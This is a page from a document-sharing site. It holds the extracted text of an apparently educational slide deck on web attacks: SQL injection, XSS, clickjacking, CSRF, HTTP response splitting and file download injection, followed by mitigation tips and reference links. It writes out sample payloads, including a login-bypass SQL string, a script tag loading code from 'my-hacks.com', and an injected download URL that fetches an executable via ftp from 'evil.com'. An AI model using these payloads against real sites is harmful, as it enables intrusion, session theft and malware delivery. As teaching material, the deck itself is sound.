Trendy Web Security

  • November 2019
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Trendy Web Security as PDF for free.

More details

  • Words: 373
  • Pages: 38
Trendy Web Security

A Review of times past

SQL Injection

password ' OR 1=1; --

Parses as: SELECT username FROM users WHERE username = 'username' and password = '' OR 1=1

And you're in...

Cross Site Scripting (XSS)

About-Me field I enjoy long walks on the beach, and <script src="http://my-hacks.com/owned.js">

Now, you have your code running in another guy's browser

Have your code change his linksys' DNS settings?

SQL Injections and XSS attacks are old news.

What's new(er)?

Click Jacking

A Demo...

No JS Needed!

Cross Site Request Forgery



You are now logged out of google.

Or... had your domain stolen

• CSRF Creates a new Gmail Filter which forwards certain emails

• Hacker sends an email forwarded to your host, asking for a transfer + unlock

• Hacker transfers your domain away.

HTTP Response Splitting

/redir_lang.jsp?lang=English /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/ 1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d %0aShazam

HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: http://10.1.1.1/by_lang.jsp?lang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 Shazam Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with Content-Type: text/html Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us S!-1251019693; path=/ Connection: Close 302 Moved Temporarily

This document you requested has moved temporarily.

It's now at http://10.1.1.1/by_lang.jsp?l ang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 <html>Shazam</html>.



Why? • Cache Poisoning • Replace content • Phishing • XSS • etc.

File Download Injection

An similar idea to response splitting

We've all written download scripts: download.php?file=report.xls

$filename = basename($_GET["download"]); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile(basename($_GET["download"])); return;

http://[trusted_domain]/download.php?file=attack.bat%0d %0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A %20evil.com%0d%0awzinet95.exe

HTTP/1.1 200 OK Date: Thu, 27 Mar 2008 05:02:24 GMT Server: Apache Path=/download Content-Disposition: attachment;filename=attack.bat Content-length: 88 echo get /pub/winzip/wzinet95.exe|ftp -A evil.com awzinet95.exe Content-Length: 0 Content-Type: application/octet-stream;charset=euc-kr

It's a dangerous world...

How about some Mitigation

As a user Sensitive stuff in separate browser?

As a programmer: Whitelist everything. Nothing gets through w/o you knowing

As a programmer: GET vs. POST. Use them correctly.

Download Injection: Use the real file name, and not the http argument

ClickJacking NoScript has a "Forbid iframe" feature

Links •

http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss



http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf



http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf



http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html



http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html



http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf



http://www.breakingpointsystems.com/community/blog/clickjacking



http://en.wikipedia.org/wiki/Cross-site_request_forgery



http://www.davidairey.com/google-gmail-security-hijack/



http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html

Related Documents

Trendy Web Security
November 2019 3
Web Security
May 2020 25
Web Security
November 2019 33
Nikkei Trendy
June 2020 3
Web Security Checkout
November 2019 13
Wp Web 2 Security
October 2019 16